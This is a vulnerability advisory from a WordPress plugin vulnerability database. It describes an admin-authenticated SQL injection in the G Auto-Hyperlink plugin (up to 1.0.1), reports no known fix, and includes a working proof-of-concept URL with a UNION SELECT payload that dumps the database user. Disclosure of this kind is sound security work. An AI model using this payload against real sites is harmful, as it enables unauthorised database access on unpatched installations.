WordPress Plugin Vulnerabilities

G Auto-Hyperlink <= 1.0.1 - Admin+ SQL Injection

Description

The plugin does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/g-auto-hyperlink/trunk/g-auto-hyperlink.php#L271

Open the follow URL as admin, which will output the current DB user: https://exxample.com/wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes

Timeline

Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other